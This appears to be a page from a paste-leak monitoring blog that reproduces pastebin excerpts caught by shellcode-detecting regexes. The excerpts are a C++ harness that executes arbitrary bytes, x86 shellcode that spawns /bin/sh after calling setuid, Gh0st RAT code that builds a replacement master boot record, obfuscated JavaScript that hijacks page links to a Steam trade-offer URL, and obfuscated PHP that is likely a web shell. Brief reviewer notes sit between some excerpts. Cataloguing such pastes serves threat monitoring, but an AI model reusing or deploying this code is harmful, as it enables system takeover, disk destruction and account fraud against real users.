Stories About Data Leaks and Related Stuff

Posts Tagged ‘Shellcode’

Shellcode


Detected 6 occurrence(s) of ‘shellcode’:

CUTE_READWRITE);

	if (sc == NULL)
	{
		cout << "Error: Cannot allocate space for shellcode!" << endl;
		return;
	}

	// Copy shellcode and execute it

	memcpy(sc, p, size);
	(*(int(*)()) sc)();
}


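/**
 * Program entry point: forwards the first command-line argument to
 * TestShellcode().
 *
 * @param argc Number of command-line arguments, including the program name.
 * @param argv Argument vector; argv[1] is passed to TestShellcode().
 * @return 0 after TestShellcode() returns, 1 when no argument was supplied.
 */
int main(int argc, char *argv[])
{
	// Without an argument argv[1] is a null pointer, and the original code
	// passed it straight through. Reject that case before calling anything.
	if (argc < 2)
	{
		std::cerr << "Usage: " << (argc > 0 ? argv[0] : "program") << " <input>" << std::endl;
		return 1;
	}

	// NOTE(review): the helper copies caller-supplied bytes into memory and
	// jumps to them, so run this harness only inside an isolated analysis VM.
	TestShellcode(argv[1]);
	return 0;
}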

Source: http://pastebin.com/raw.php?i=HeJfjxwg

Shellcode


Detected 5 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"

"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"

"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"

"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"

"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"

Source: http://pastebin.com/raw.php?i=Un5cB8eZ

Shellcode


Detected 3 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

81/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):

// CGh0stApp message handlers 
 
// Analyst note: 48-byte payload that KillMBR() copies to the start of a
// 512-byte sector buffer before it sets the 0x55 0xAA boot signature.
// The first 24 bytes decode as 16-bit real-mode x86 that calls BIOS INT 10h
// video services; the last 24 bytes are the ASCII text that code displays.
// That embedded text is a stable static indicator for signature matching.
// The excerpt ends before any disk write is shown.
unsigned char scode[] = 
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
 
int CGh0stApp::KillMBR() 
{ 
	HANDLE hDevice; 
	DWORD dwBytesWritten, dwBytesReturned; 
	BYTE pMBR[512] = {0}; 
	 
	// ????MBR 
	memcpy(pMBR, scode, sizeof(scode) - 1); 
	pMBR[510] = 0x55; 
	pMBR[511] = 0xAA; 
	 

Source: http://pastebin.com/raw.php?i=87fTTx2H

Shellcode


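Detected 12 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’ (the pattern matches any run of ten hex escapes; the excerpt below is hex-escaped string data in obfuscated JavaScript, not machine code):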

8\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x65\x61\x6D\x63\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x2E\x63\x6F\x6D\x2F\x74\x72\x61\x64\x65\x6F\x66\x66\x65\x72\x2F\x6E\x65\x77\x2F\x3F\x70\x61\x72\x74\x6E\x65\x72\x3D\x33\x36\x31\x37\x34\x31\x30\x33\x34\x26\x74\x6F\x6B\x65\x6E\x3D\x55\x39\x78\x65\x39\x54\x66\x6B","\x6F\x6E\x63\x6C\x69\x63\x6B","\x5F\x62\x6C\x61\x6E\x6B","\x6F\x70\x65\x6E"];setInterval(function(){var _0x22cex1=document[_0x88f8[1]](_0x88f8[0]);for(i= 0;i< _0x22cex1[_0x88f8[2]];i++){_0x22cex1[i][_0x88f8[3]]= _0x88f8[4];_0x22cex1[

Source: http://pastebin.com/raw.php?i=kjMFmRij

Shellcode


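Detected 8 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’ (the pattern matches any run of ten hex escapes; the excerpt below appears to be a hex-escaped character table in obfuscated PHP, not machine code):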

c\x59\x7c\x5f\x6f\x36\x2b\x37\x73\x24\x76\x30\x70\x5b\x4b\x7d\x41\x21\x78\x47\x77\x6b\x4c\x44\x56\x53\x20\x4d\x39\x49\x34\x40\x71\x43\xa\x22\x61\x50\x48\x5e\x27\x5a\x51\x6d\x32\x23\x3e\x33\x55\x6e\x3f\x66\x2e\x7a\x65\x54\x72\x29\x2a\x28\x45\x42\x6a\x4f\x60\x4e\x25\x46\x31\x68\x52\x2c\x26\x3b\x58";
$GLOBALS[$GLOBALS['xc44'][3].$GLOBALS['xc44'][59].$GLOBALS['xc44'][51].$GLOBALS['xc44'][15].$GLOBALS['xc44'][30].$GLOBALS['xc44'][30].$GLOBALS['xc44'][53]] = $GLOBALS['xc44'][7].$GLOBALS['xc44'][92].$GLOBALS['xc44'][79];
$GLOBALS[$GLOBALS['xc44'][41].

Source: http://pastebin.com/raw.php?i=CVYMqnzB